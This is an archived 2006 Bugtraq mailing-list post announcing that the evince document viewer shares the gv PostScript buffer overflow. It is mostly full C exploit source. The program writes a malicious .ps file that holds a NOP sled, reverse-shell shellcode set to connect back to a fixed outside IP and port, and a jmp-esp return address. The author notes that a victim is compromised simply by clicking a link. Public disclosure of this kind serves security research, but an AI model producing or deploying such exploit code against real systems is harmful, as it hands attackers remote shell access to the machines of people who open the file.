evince buffer overflow exploit (gv)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: evince buffer overflow exploit (gv)
From: kspecial <kspecial@xxxxxxxxxxxxxxx>
Date: Tue, 28 Nov 2006 00:11:48 -0500
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mutt/1.5.13 (2006-08-11)

hey team, seems evince is vuln through it's embedded use of gv to the same hole 
described in bid 20978. here is exploit code for evince. users using
epiphany web browser beware, this is click-a-link exploitation.

--K-sPecial

/*
 * Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: evince-ps-field-bof.c
 * Date: 11/27/2006
 * Version: 
 *      1.00 - creation
 *
 * Other: this idea originaly came from the bid for the 'gv' buffer overflow 
(20978), i don't
 *  believe it's known until now that evince is also vulnerable. 
 *
 * Compile: gcc -o epfb evince-ps-field-bof.c -std=c99
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>

// insert shellcode here, i'm not going to implement ip/port changing since
// metasploit's shellcode generation engine does it just fine. i had a picky 
time
// with the shellcodes, there must be some bad bytes. this shellcode from 
// metasploit works but be SURE to set Encoder=None

/* linux_ia32_reverse -  LHOST=67.76.107.14 LPORT=5555 Size=70 Encoder=None 
http://metasploit.com */
char cb[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x43\x4c\x6b\x0e\x66\x68"
"\x15\xb3\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

// location of "jmp *%esp"
char jmpesp[] = "\x77\xe7\xff\xff";

int main (int argc, char **argv) {
        FILE *fh;

        if (!(fh = fopen(*(argv+1), "w+b"))) { 
                printf("%s <file.ps>\n\n", *(argv));
                printf("[-] unable to open file '%s' for writing: %s\n", 
*(argv+1), strerror(errno));
                exit(1);
        }

        fputs("%!PS-Adobe-3.0\n", fh);
        fputs("%%Title: hello.ps\n", fh);
        fputs("%%For: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n", 
fh);
        fputs("%%BoundingBox: 24 24 588 768\n", fh);
        fputs("%%DocumentMedia: ", fh);
        for (int i = 0; i < 100; i++) 
                fputc(0x90, fh);

        fwrite(cb, strlen(cb), 1, fh);

        for (int i = strlen(cb) + 100; i < 273; i++) 
                fputc('A', fh);

        fwrite(jmpesp, 4, 1, fh);
        fwrite("\xe9\x02\xff\xff\xff", 5, 1, fh);

        fputc('\n', fh);

        fputs("%%DocumentData: Clean7Bit\n", fh);
        fputs("%%Orientation: Landscape\n", fh);
        fputs("%%Pages: 1\n", fh);
        fputs("%%PageOrder: Ascend\n", fh);
        fputs("%%+ encoding ISO-8859-1Encoding\n", fh);
        fputs("%%EndComments\n", fh);

        return(0);
}

Prev by Date: [USN-386-1] ImageMagick vulnerability
Next by Date: Re: Re: "Which is more secure? Oracle vs. Microsoft" (is it a fair comparison?)
Previous by thread: [USN-386-1] ImageMagick vulnerability
Next by thread: TSLSA-2006-0066 - multi
Index(es):
- Date
- Thread